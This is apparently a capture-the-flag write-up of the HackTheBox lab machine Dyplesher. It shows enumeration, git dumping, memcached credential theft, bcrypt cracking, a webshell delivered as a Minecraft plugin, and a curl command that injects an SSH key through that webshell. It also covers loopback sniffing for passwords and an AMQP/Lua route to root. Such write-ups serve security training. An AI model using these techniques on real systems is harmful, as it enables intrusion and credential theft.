/* */
06/05/2021

Hackthebox Dyplesher Writeup – 10.10.10.190

Enumerations
MASSCAN and NMAP

root@kali:~/htb/boxes/dyplesher# masscan -i tun0 -p1-65535 --rate=1000 10.10.10.190

Starting masscan 1.0.5 (http://bit.ly/14GZzcT) at 2020-06-10 14:32:59 GMT
 -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [65535 ports/host]
Discovered open port 5672/tcp on 10.10.10.190                                  
Discovered open port 25672/tcp on 10.10.10.190                                 
Discovered open port 25565/tcp on 10.10.10.190                                 
Discovered open port 3000/tcp on 10.10.10.190                                  
Discovered open port 22/tcp on 10.10.10.190                                    
Discovered open port 4369/tcp on 10.10.10.190                                  
Discovered open port 80/tcp on 10.10.10.190                                    
Discovered open port 11211/tcp on 10.10.10.190                                 
Discovered open port 25562/tcp on 10.10.10.190 

NMAP Service Scan

# Nmap 7.80 scan initiated Wed Jun 10 17:38:59 2020 as: nmap -p 5372,25672,25565,3000,22,4369,80,11211,25562 -sC -sV -oA nmap_out dyplesher.htb
Host: 10.10.10.190 (dyplesher.htb)
Ports: 
22/open/tcp//ssh//OpenSSH 8.0p1 Ubuntu 6build1
80/open/tcp//http//Apache httpd 2.4.1
3000/open/tcp//ppp
4369/open/tcp//epmd//Erlang Port Mapper Daemon
5372/filtered/tcp
11211/open/tcp//memcache
25562/open/tcp
25565/open/tcp//minecraft
25672/open/tcp
# Nmap done at Wed Jun 10 17:42:01 2020 -- 1 IP address (1 host up) scanned in 182.18 seconds


I can try port 80 web services (before add “dyplesher.htb” to hosts file)

root@kali:~/htb/boxes/dyplesher# cat /etc/hosts
127.0.0.1	localhost
127.0.1.1	kali
10.10.10.190	dyplesher.htb

# The following lines are desirable for IPv6 capable hosts
::1     localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters

dyplesher.htb

I have a new adress. “test.dyplesher.htb”. we add this domain adress to hosts file.

“test.dyplesher.htb” > this not working. maybe rabbit holl.

I can try to wfuzz for find other pages

root@kali:~/htb/boxes/dyplesher# wfuzz -u http://test.dyplesher.htb/FUZZ -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-medium-files-lowercase.txt --hc 404,403 -c

Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.

********************************************************
* Wfuzz 2.4.5 - The Web Fuzzer                         *
********************************************************

Target: http://test.dyplesher.htb/FUZZ
Total requests: 16245

===================================================================
ID           Response   Lines    Word     Chars       Payload                                                                                                                                           
===================================================================

000000001:   200        14 L     27 W     239 Ch      "index.php"                                                                                                                                       
000000366:   200        14 L     27 W     239 Ch      "."                                                                                                                                               
000001849:   301        9 L      28 W     323 Ch      ".git"  

root@kali:~/htb/boxes/dyplesher# wfuzz -u http://dyplesher.htb/FUZZ -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-medium-files-lowercase.txt --hc 404,403 -c

Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.

********************************************************
* Wfuzz 2.4.5 - The Web Fuzzer                         *
********************************************************

Target: http://dyplesher.htb/FUZZ
Total requests: 16245

===================================================================
ID           Response   Lines    Word     Chars       Payload                                                                                                                                           
===================================================================

000000001:   200        123 L    241 W    4252 Ch     "index.php"                                                                                                                                       
000000102:   200        0 L      0 W      0 Ch        "favicon.ico"                                                                                                                                     
000000237:   200        2 L      3 W      24 Ch       "robots.txt"  

we find “test.dyplesher.htb/.git
this url not access with browser. I can use git-dumper.py

root@kali:~/htb/boxes/dyplesher# git-dumper http://test.dyplesher.htb/.git test_dyp_git
[-] Testing http://test.dyplesher.htb/.git/HEAD [200]
[-] Testing http://test.dyplesher.htb/.git/ [403]
[-] Fetching common files
[-] Fetching http://test.dyplesher.htb/.git/COMMIT_EDITMSG [200]
[-] Fetching http://test.dyplesher.htb/.gitignore [404]
[-] Fetching http://test.dyplesher.htb/.git/description [200]
[-] Fetching http://test.dyplesher.htb/.git/hooks/applypatch-msg.sample [200]
[-] Fetching http://test.dyplesher.htb/.git/hooks/commit-msg.sample [200]
[-] Fetching http://test.dyplesher.htb/.git/hooks/post-commit.sample [404]
[-] Fetching http://test.dyplesher.htb/.git/hooks/post-receive.sample [404]
[-] Fetching http://test.dyplesher.htb/.git/hooks/post-update.sample [200]
[-] Fetching http://test.dyplesher.htb/.git/hooks/pre-applypatch.sample [200]
[-] Fetching http://test.dyplesher.htb/.git/hooks/pre-commit.sample [200]
[-] Fetching http://test.dyplesher.htb/.git/hooks/pre-push.sample [200]
[-] Fetching http://test.dyplesher.htb/.git/hooks/pre-receive.sample [200]
[-] Fetching http://test.dyplesher.htb/.git/hooks/prepare-commit-msg.sample [200]
[-] Fetching http://test.dyplesher.htb/.git/hooks/update.sample [200]
[-] Fetching http://test.dyplesher.htb/.git/objects/info/packs [404]
[-] Fetching http://test.dyplesher.htb/.git/hooks/pre-rebase.sample [200]
[-] Fetching http://test.dyplesher.htb/.git/index [200]
[-] Fetching http://test.dyplesher.htb/.git/info/exclude [200]
[-] Finding refs/
[-] Fetching http://test.dyplesher.htb/.git/FETCH_HEAD [404]
[-] Fetching http://test.dyplesher.htb/.git/HEAD [200]
[-] Fetching http://test.dyplesher.htb/.git/ORIG_HEAD [404]
[-] Fetching http://test.dyplesher.htb/.git/info/refs [404]
[-] Fetching http://test.dyplesher.htb/.git/config [200]
[-] Fetching http://test.dyplesher.htb/.git/logs/HEAD [200]
[-] Fetching http://test.dyplesher.htb/.git/logs/refs/heads/master [200]
[-] Fetching http://test.dyplesher.htb/.git/logs/refs/remotes/origin/HEAD [404]
[-] Fetching http://test.dyplesher.htb/.git/logs/refs/remotes/origin/master [200]
[-] Fetching http://test.dyplesher.htb/.git/logs/refs/stash [404]
[-] Fetching http://test.dyplesher.htb/.git/packed-refs [404]
[-] Fetching http://test.dyplesher.htb/.git/refs/heads/master [200]
[-] Fetching http://test.dyplesher.htb/.git/refs/remotes/origin/HEAD [404]
[-] Fetching http://test.dyplesher.htb/.git/refs/remotes/origin/master [200]
[-] Fetching http://test.dyplesher.htb/.git/refs/stash [404]
[-] Fetching http://test.dyplesher.htb/.git/refs/wip/wtree/refs/heads/master [404]
[-] Fetching http://test.dyplesher.htb/.git/refs/wip/index/refs/heads/master [404]
[-] Finding packs
[-] Finding objects
[-] Fetching objects
[-] Fetching http://test.dyplesher.htb/.git/objects/00/00000000000000000000000000000000000000 [404]
[-] Fetching http://test.dyplesher.htb/.git/objects/e6/9de29bb2d1d6434b8b29ae775ad8c2e48c5391 [200]
[-] Fetching http://test.dyplesher.htb/.git/objects/b1/fe9eddcdf073dc45bb406d47cde1704f222388 [200]
[-] Fetching http://test.dyplesher.htb/.git/objects/27/29b565f353181a03b2e2edb030a0e2b33d9af0 [200]
[-] Fetching http://test.dyplesher.htb/.git/objects/3f/91e452f3cbfa322a3fbd516c5643a6ebffc433 [200]
[-] Running git checkout .

I download git files into “test_dyp_git” folder.

root@kali:~/htb/boxes/dyplesher/test_dyp_git# ls -la
total 16
drwxr-xr-x 3 root root 4096 Jun 10 18:21 .
drwxr-xr-x 6 root root 4096 Jun 10 18:12 ..
drwxr-xr-x 7 root root 4096 Jun 10 18:12 .git
-rw-r--r-- 1 root root  513 Jun 10 18:12 index.php
-rw-r--r-- 1 root root    0 Jun 10 18:12 README.md

index.php

We found memcached credentials and service port 11211
I used Memcached client tool for process.

root@kali:~/htb/boxes/dyplesher# memcached-cli felamos:zxcvbnm@dyplesher.htb
dyplesher.htb> get username
MinatoTW
felamos
yuntao

dyplesher.htb> get password
$2a$10$5SAkMNF9fPNamlpWr.ikte0rHInGcU54tvazErpuwGPFePuI1DCJa
$2y$12$c3SrJLybUEOYmpu1RVrJZuPyzE5sxGeM0ZChDhl8MlczVrxiA3pQK
$2a$10$zXNCus.UXtiuJE5e6lsQGefnAH3zipl.FRNySz5C4RjitiwUoalS
Password cracking with John

root@kali:~/htb/boxes/dyplesher# john --wordlist=/usr/share/wordlists/rockyou.txt hash.memcached 
Using default input encoding: UTF-8
Loaded 2 password hashes with 2 different salts (bcrypt [Blowfish 32/64 X3])
Remaining 1 password hash
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 16 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:38 0.06% (ETA: 12:02:46) 0g/s 272.6p/s 272.6c/s 272.6C/s bossy..jersey1
0g 0:00:01:43 0.16% (ETA: 12:11:32) 0g/s 271.6p/s 271.6c/s 271.6C/s 090586..nakata
0g 0:00:01:58 0.19% (ETA: 12:09:39) 0g/s 272.5p/s 272.5c/s 272.5C/s bheibhie..113085
Session aborted
root@kali:~/htb/boxes/dyplesher# john --show hash.memcached 

$2y$12$c3SrJLybUEOYmpu1RVrJZuPyzE5sxGeM0ZChDhl8MlczVrxiA3pQK:mommy1

1 password hash cracked, 1 left

http://dyplesher.htb:3000/ is running Gogs Version 0.11.91.0811 – “A painless self-hosted Git service”. Register and login using newly created account. It’s possible to enumerate user’s emails:

minatotw@dyplesher.htb
felamos@dyplesher.htb
yuntao@dyplesher.htb






We found it gitlab.git and memcached.git… Now clone repository.

root@kali:~/htb/boxes/dyplesher# git clone http://dyplesher.htb:3000/felamos/gitlab.git
Cloning into 'gitlab'...
Username for 'http://dyplesher.htb:3000': felamos@dyplesher.htb
Password for 'http://felamos@dyplesher.htb@dyplesher.htb:3000': 
remote: Enumerating objects: 3, done.
remote: Counting objects: 100% (3/3), done.
remote: Total 3 (delta 0), reused 0 (delta 0)
Unpacking objects: 100% (3/3), 227 bytes | 227.00 KiB/s, done.

root@kali:~/htb/boxes/dyplesher# cd gitlab/
root@kali:~/htb/boxes/dyplesher/gitlab# ls
README.md
root@kali:~/htb/boxes/dyplesher/gitlab# cat README.md 
# gitlab
Gitlab backup
root@kali:~/htb/boxes/dyplesher/gitlab# 
root@kali:~/htb/boxes/dyplesher# git clone http://dyplesher.htb:3000/felamos/memcached.git
Cloning into 'memcached'...
Username for 'http://dyplesher.htb:3000': felamos@dyplesher.htb
Password for 'http://felamos@dyplesher.htb@dyplesher.htb:3000': 
remote: Enumerating objects: 4, done.
remote: Counting objects: 100% (4/4), done.
remote: Compressing objects: 100% (3/3), done.
remote: Total 4 (delta 0), reused 0 (delta 0)
Unpacking objects: 100% (4/4), 559 bytes | 559.00 KiB/s, done.

Enumerating clone files but I don’t see special anything. I have a felamos password. Go to login into felamos repository.

felamos’ repository. downloaded repo.zip
root@kali:~/htb/boxes/dyplesher/repos/repositories# ls -R
.:
@hashed

./@hashed:
4b  4e  6b  d4

./@hashed/4b:
22

./@hashed/4b/22:
4b227777d4dd1fc61c6f884f48641d02b4d121d3fd328cb08b5531fcacdabf8a.bundle

./@hashed/4e:
07

./@hashed/4e/07:
4e07408562bedb8b60ce05c1decfe3ad16b72230967de01f640b7e4729b49fce
4e07408562bedb8b60ce05c1decfe3ad16b72230967de01f640b7e4729b49fce.bundle

./@hashed/4e/07/4e07408562bedb8b60ce05c1decfe3ad16b72230967de01f640b7e4729b49fce:

./@hashed/6b:
86

./@hashed/6b/86:
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b.bundle

./@hashed/d4:
73

./@hashed/d4/73:
d4735e3a265e16eee03f59718b9b5d03019c07d8b6c51f90da3a666eec13ab35.bundle

All bundle file merge in bundle_files folder and I can use command git clone bundle of name.

root@kali:~/htb/boxes/dyplesher/bundle_unpack# cat clone.sh 

git clone 4b227777d4dd1fc61c6f884f48641d02b4d121d3fd328cb08b5531fcacdabf8a.bundle
git clone 4e07408562bedb8b60ce05c1decfe3ad16b72230967de01f640b7e4729b49fce.bundle
git clone 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b.bundle
git clone d4735e3a265e16eee03f59718b9b5d03019c07d8b6c51f90da3a666eec13ab35.bundle

root@kali:~/htb/boxes/dyplesher/bundle_unpack# chmod +x clone.sh 

root@kali:~/htb/boxes/dyplesher/bundle_unpack# ./clone.sh 
Cloning into '4b227777d4dd1fc61c6f884f48641d02b4d121d3fd328cb08b5531fcacdabf8a'...
Receiving objects: 100% (39/39), 10.46 KiB | 10.46 MiB/s, done.
Resolving deltas: 100% (12/12), done.
Cloning into '4e07408562bedb8b60ce05c1decfe3ad16b72230967de01f640b7e4729b49fce'...
Receiving objects: 100% (51/51), 20.94 MiB | 59.55 MiB/s, done.
Resolving deltas: 100% (5/5), done.
Cloning into '6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b'...
Receiving objects: 100% (85/85), 30.69 KiB | 10.23 MiB/s, done.
Resolving deltas: 100% (40/40), done.
Cloning into 'd4735e3a265e16eee03f59718b9b5d03019c07d8b6c51f90da3a666eec13ab35'...
Receiving objects: 100% (21/21), 16.98 KiB | 16.98 MiB/s, done.
Resolving deltas: 100% (9/9), done.

Cloned bundle files. Now research in cloned files.

root@kali:~/htb/boxes/dyplesher/bundle_unpack# ls -R

./4b227777d4dd1fc61c6f884f48641d02b4d121d3fd328cb08b5531fcacdabf8a:
LICENSE  README.md  src

./4b227777d4dd1fc61c6f884f48641d02b4d121d3fd328cb08b5531fcacdabf8a/src:
VoteListener.py

./4e07408562bedb8b60ce05c1decfe3ad16b72230967de01f640b7e4729b49fce:
banned-ips.json      commands.yml         help.yml         plugins    sc-mqtt.jar        start.command   world
banned-players.json  craftbukkit-1.8.jar  ops.json         python     server.properties  usercache.json  world_the_end
bukkit.yml           eula.txt             permissions.yml  README.md  spigot-1.8.jar     whitelist.json

./4e07408562bedb8b60ce05c1decfe3ad16b72230967de01f640b7e4729b49fce/plugins:
LoginSecurity  LoginSecurity.jar  PluginMetrics

./4e07408562bedb8b60ce05c1decfe3ad16b72230967de01f640b7e4729b49fce/plugins/LoginSecurity:
authList  config.yml  users.db

./4e07408562bedb8b60ce05c1decfe3ad16b72230967de01f640b7e4729b49fce/plugins/PluginMetrics:
config.yml

./4e07408562bedb8b60ce05c1decfe3ad16b72230967de01f640b7e4729b49fce/python:
pythonMqtt.py

./4e07408562bedb8b60ce05c1decfe3ad16b72230967de01f640b7e4729b49fce/world:
data  level.dat  level.dat_mcr  level.dat_old  playerdata  region  session.lock  uid.dat

./4e07408562bedb8b60ce05c1decfe3ad16b72230967de01f640b7e4729b49fce/world/data:
villages.dat  villages_end.dat

./4e07408562bedb8b60ce05c1decfe3ad16b72230967de01f640b7e4729b49fce/world/playerdata:
18fb40a5-c8d3-4f24-9bb8-a689914fcac3.dat

./4e07408562bedb8b60ce05c1decfe3ad16b72230967de01f640b7e4729b49fce/world/region:
r.0.0.mca  r.-1.0.mca

./4e07408562bedb8b60ce05c1decfe3ad16b72230967de01f640b7e4729b49fce/world_the_end:
DIM1  level.dat  level.dat_old  session.lock  uid.dat

./4e07408562bedb8b60ce05c1decfe3ad16b72230967de01f640b7e4729b49fce/world_the_end/DIM1:
region

./4e07408562bedb8b60ce05c1decfe3ad16b72230967de01f640b7e4729b49fce/world_the_end/DIM1/region:
r.0.0.mca  r.0.-1.mca  r.-1.0.mca  r.-1.-1.mca

./6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b:
LICENSE  phpbash.min.php  phpbash.php  README.md

./d4735e3a265e16eee03f59718b9b5d03019c07d8b6c51f90da3a666eec13ab35:
LICENSE.txt  nightminer.py  README.md

We have a lot of files. I found something interesting in them.
users.db

root@kali:~/htb/boxes/dyplesher/bundle_unpack# find -name *.db
./4e07408562bedb8b60ce05c1decfe3ad16b72230967de01f640b7e4729b49fce/plugins/LoginSecurity/users.db

BCRYPT password.

BCRYPT password cracking with John…

root@kali:~/htb/boxes/dyplesher/bundle_unpack# cat user_db.hash 
$2a$10$IRgHi7pBhb9K0QBQBOzOju0PyOZhBnK4yaWjeZYdeP6oyDvCo9vc6

root@kali:~/htb/boxes/dyplesher/bundle_unpack# john --wordlist=/usr/share/wordlists/rockyou.txt user_db.hash 
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 16 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
alexis1          (?)
1g 0:00:00:05 DONE (2020-06-10 20:49) 0.1675g/s 289.4p/s 289.4c/s 289.4C/s alexis1..argentina
Use the "--show" option to display all of the cracked passwords reliably
Session completed

login to “dyplesher.htb/login.php” with felamos@dyplesher.htb:alexis1 credentials.

that is Minecraft server.

Minecraft plugin upload is working. We make Plugin with included shell. Minecraft plugins java language and external source.
Now making Plugin with webshell. I use Eclipse software.
referance link (Turkish): https://forum.gamer.com.tr/konu/dev-rehber-minecraft-icin-eklenti-nasil-yazilir-gelistirme-programlari-nelerdir-artik-siz-de-kolayca-eklenti-yazmaya-baslayabilirsiniz.445340/

The name you wrote here,
the name you will type while reloading the plugin.
Delete the // section. it is written as an example.

upload dcr.jar to plugin uploaded page.

This is important… Fill in the Reload Plugin name of plugin.yml

We have a web shell. But ping, wget and curl not working. then let’s try installing ssh key. will it happen. because we know the user.

root@kali:~/htb/boxes/dyplesher# cat curl.sh 
#!/bin/bash

curl -G 'http://test.dyplesher.htb/dcr.php' --data-urlencode 'cmd=echo ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDHcjSyzXrfOiNyXwSERm0Ud6uLYtw30Z6ZaMLeJHg0JBrlMyyW8MVMuFZn1tHfHKH4bNURScZ3Wg6wBc7kggRz4ES2jZsH86OL1Q9UrHVKECUgyyIPBKTt0Pyzotw+tip2+ALe22ItHrjcoLunKAN7Mnu0ii78ZpvFcNjSKdE29e76iCoNs5+9YJxx23U4theUFV8A7CTBf2U4WcKdfEKsykeyvl19OGAONT8hyKtGuwZVTRm5kdzLmsSczMDol1KlZ+JbqE8jjx1LNSel2jRfAj1HOS0kviwIzW22d/irDgEOeOvhSGcatpRe+65L3LGuGxIBE8qEVJfTLCp5L+ftjAau+bZUVR/OoZ54Efhx9/M+q+GmjF4CMTNetDxrokSgkG15F0fmaBi8hsBfBUXqK4Fk/aZUeqq0/USYzBclMkUUhkHejwnH4MO5f3XsH6iV1BzyaMoI+UC/2i0eA6GT2Ue16NUgUmsWgOBdnKMR76p5sh0eOK2jSAHgBuqz2 root@kali > /home/MinatoTW/.ssh/authorized_keys'

root@kali:~/htb/boxes/dyplesher# ./curl.sh 
root@kali:~/htb/boxes/dyplesher# ssh -i id_rsa MinatoTW@dyplesher.htb
Welcome to Ubuntu 19.10 (GNU/Linux 5.3.0-46-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Thu 11 Jun 2020 07:17:35 AM UTC

  System load:  0.16              Processes:              247
  Usage of /:   6.8% of 97.93GB   Users logged in:        0
  Memory usage: 42%               IP address for ens33:   10.10.10.190
  Swap usage:   0%                IP address for docker0: 172.17.0.1


57 updates can be installed immediately.
0 of these updates are security updates.
To see these additional updates run: apt list --upgradable

Failed to connect to https://changelogs.ubuntu.com/meta-release. Check your Internet connection or proxy settings


Last login: Thu Jun 11 06:28:21 2020 from 10.10.14.2
MinatoTW@dyplesher:~$ id
uid=1001(MinatoTW) gid=1001(MinatoTW) groups=1001(MinatoTW),122(wireshark)
MinatoTW@dyplesher:~$ 

user.txt is not here.
We need to find the password of felamos or yuntao. Notable here is that the user of MinatoTW is Wireshark authorized. that means we can make a sniff here. I used tshark tool.

MinatoTW@dyplesher:~$ ip link show
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN mode DEFAULT group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP mode DEFAULT group default qlen 1000
    link/ether 00:50:56:b9:5d:42 brd ff:ff:ff:ff:ff:ff
3: docker0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP mode DEFAULT group default 
    link/ether 02:42:19:48:30:e7 brd ff:ff:ff:ff:ff:ff
5: veth99ea606@if4: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue master docker0 state UP mode DEFAULT group default 
    link/ether 3e:bb:99:af:06:62 brd ff:ff:ff:ff:ff:ff link-netnsid 0
MinatoTW@dyplesher:~$ 

MinatoTW@dyplesher:~$ tshark -i lo -F pcap -w captured_dcr.pcap
Capturing on 'Loopback: lo'
628 ^C

root@kali:~/htb/boxes/dyplesher# scp -i id_rsa MinatoTW@dyplesher.htb:captured_dcr.pcap /root/htb/boxes/dyplesher/captured_dcr.pcap  

We received our file using scp. Let’s examine it. What we will find.

We found four different login names and passwords. Let’s start with felamos.

“name”:”MinatoTW”,”email”:”MinatoTW@dyplesher.htb“,”password”:”bihys1amFov
“name”:”yuntao”,”email”:”yuntao@dyplesher.htb“,”password”:”wagthAw4ob
“name”:”felamos”,”email”:”felamos@dyplesher.htb“,”password”:”tieb0graQueg
yuntao:EashAnicOc3Op

MinatoTW@dyplesher:~$ su felamos
Password: 
felamos@dyplesher:/home/MinatoTW$ cd
felamos@dyplesher:~$ ls
cache  snap  user.txt  yuntao
felamos@dyplesher:~$ cat user.txt 
8c371079e970d216f0149bdefa280000
felamos@dyplesher:~$ id
uid=1000(felamos) gid=1000(felamos) groups=1000(felamos)
felamos@dyplesher:~$ 

We have user.txt. Now, what can we do to be root, let’s investigate.

felamos and yuntao also did not find anything for privileges. so I decided to use pspy tool.

kali:~/htb/boxes/dyplesher# scp pspy64 felamos@dyplesher.htb:/home/felamos/
felamos@dyplesher.htb's password: 
pspy64                                          100% 3006KB   3.6MB/s   00:00    
root@kali:~/htb/boxes/dyplesher# 

pspy couldn’t find anything. I tried the ps -a command.

lua / pika Advanced Message Queuing Protocol (AMQP) service … Then I prepared a script by looking at the following resources.
We have two different passwords of yuntao user. And this user is the AMQP manager.

Referance-1
Referance-2

First making python script.

Secondly, we should make lua script on dyplesher machine.

To get root, we write our ssh public key to lua file. To do this, we first run the following command on the dyplesher machine.
Then we run the script we created on our own machine.
And we will have written our public key we prepared in /root/.ssh/authorized_keys.

MinatoTW@dyplesher:~$ vi dcrx.lua
MinatoTW@dyplesher:~$ python3 -m http.server 1515
Serving HTTP on 0.0.0.0 port 1515 (http://0.0.0.0:1515/) ...
127.0.0.1 - - [11/Jun/2020 08:54:52] "GET /dcrx.lua HTTP/1.0" 200 -

root@kali:~/htb/boxes/dyplesher# ./betik.py 

It Worked… 🙂

root@kali:~/htb/boxes/dyplesher# ssh -i id_rsa root@dyplesher.htb
Welcome to Ubuntu 19.10 (GNU/Linux 5.3.0-46-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Thu 11 Jun 2020 08:56:37 AM UTC

  System load:  0.07              Processes:              254
  Usage of /:   6.9% of 97.93GB   Users logged in:        1
  Memory usage: 32%               IP address for ens33:   10.10.10.190
  Swap usage:   0%                IP address for docker0: 172.17.0.1


57 updates can be installed immediately.
0 of these updates are security updates.
To see these additional updates run: apt list --upgradable

Failed to connect to https://changelogs.ubuntu.com/meta-release. Check your Internet connection or proxy settings


Last login: Sun May 24 03:33:34 2020
root@dyplesher:~# id
uid=0(root) gid=0(root) groups=0(root)
root@dyplesher:~# cat root.txt 
e623e92ffdefe369e3b7b955058e2feb
root@dyplesher:~# 

This machine was very fun and instructive. Thank you for reading and studying.

error: Content is protected !!